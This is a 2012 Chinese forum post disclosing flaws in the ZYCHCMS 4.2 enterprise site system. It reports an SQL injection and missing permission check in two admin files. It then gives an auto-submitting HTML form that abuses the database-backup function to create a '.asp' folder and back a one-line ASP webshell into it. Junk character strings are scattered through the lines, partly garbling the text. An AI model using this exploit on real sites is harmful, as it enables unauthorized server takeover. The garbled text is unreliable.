. ~% W6 Z8 M3 e* b p0 M3 w7 R
3 X) p# @' V% i- v
1 v* B" G* }! X% g3 R" p# A& z6 L& D5 n5 H
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)1 b& Y2 P2 L# }
①SQL注射漏洞- U" s5 m2 b3 A# F6 ^- I
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp4 ^- i# k* X- z) y
漏洞原因:未过滤
7 B# V- P" h3 ?! j+ L 漏洞代码:
* F+ z, B$ P* ?6 ? 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
2 {* x' w! `/ |8 I 修复方法:在文件开头加入代码3 H+ E3 q* x( a, _; M0 `% e0 [
% P4 F, u8 O v2 e E1 r/ P
& p2 D9 g( W& i/ i4 J, f
②后台拿WBSHELL q& D/ }$ x% A. @+ g" b% A
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
6 X6 G2 a% t& C. K 这里在网上找了一个,改了下,将就着用。
. E4 d3 S7 R3 O# c% _& W8 \ ` 以下是代码本地提交代码& P } d' ^3 X* l- u v* T
W( p; J6 m9 F. D4 ~! Y' w3 O
4 K& h& p7 y. c/ J0 W
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ s2 u$ J( ~" V4 i, }% K
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
+ s- H# T5 D4 ` <tr>( i/ }3 `7 V7 t( y
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
- D" z- }; y/ n6 \/ P" U! X& o </tr>9 ?& k2 |) g. J ]8 V, I: n" X
<tr>0 N! a* R* {& }0 p" X
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>; F" f, h8 B# M8 V2 T
</span>
; ]1 V9 Y2 `) J4 ]) j <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
2 w* q1 }8 y- T! p <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >4 z/ ~. p( p3 Q
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
* R& S+ V/ H% U9 l% H; P! j3 I <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d' W: I( m- i o+ y5 C
<div align=”left”>
! z+ j& Z; e0 d) v <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />7 n7 Z: Y' D+ O* p) [, U# g# D
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>8 E4 Y7 w4 O/ T0 ^4 Q/ [- @; n# A
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
, L U6 K1 w1 A$ o </div></td>9 Y; s2 @2 {( g' _# Z( ?
</tr>
2 h W7 f9 f4 S$ R: R/ t <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
8 I: D! T( f3 A5 I$ ^ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>, m6 J5 r8 k3 ]5 B# M3 y) K
<td class=”td”><div align=”left”>
. v* |( i k7 m$ c: l) r <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
1 Y& U4 e& s0 I1 w5 s [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
: Z( s) e+ _& a1 v/ d5 } </tr> U9 m# F' b( ]& @* G
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>- m' i7 }% ~2 X" O+ C' E
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
; t: T( w/ i& o( s' J/ ^9 L; O3 G <td class=”td”><div align=”left”># g$ W& Q$ _+ d* }6 ]
<input type=”submit” value=”确定备份” class=”btn”* A7 n; \5 k; `, w8 J {
</div></td>
! l& p$ T, b7 ] j& a </tr>
- L& p' w6 A! y3 o2 D1 [ </table></td></tr></form>8 O+ @( a- ~; P
</table>
! B/ L, }! P* r! A' M! `& w </td>
, \0 k7 X. Q- A% U; u </tr>
7 Q; H+ W6 L) B& P6 P </table>
5 h4 r! J4 l9 z% A/ Z <script>
$ w R0 H0 N( U& H9 Z2 i( M3 y" z7 } document.all.add.submit();
" W* ^* j! \6 _* t </script>
6 f% q, X: _( H: L7 Z6 s0 B# V" T
3 G0 v. a R/ f/ j& v9 C, Z' T9 ], L/ S4 n9 c' H% E: q
9 R" j/ g% W* B1 B( N
$ }6 C: g3 I& x# D, v% v; f( p; h/ R/ J
5 _5 u, ^, T6 [5 `4 x
( T2 ^5 o+ s* K( N5 z
. R& q8 D+ T& ]1 V0 F6 B# v+ {- H; t; J9 k
- W; z) V! z0 B4 V
' ^, k; T o! g& x |
发表于 2012-9-10 21:09:51
收藏
支持
反对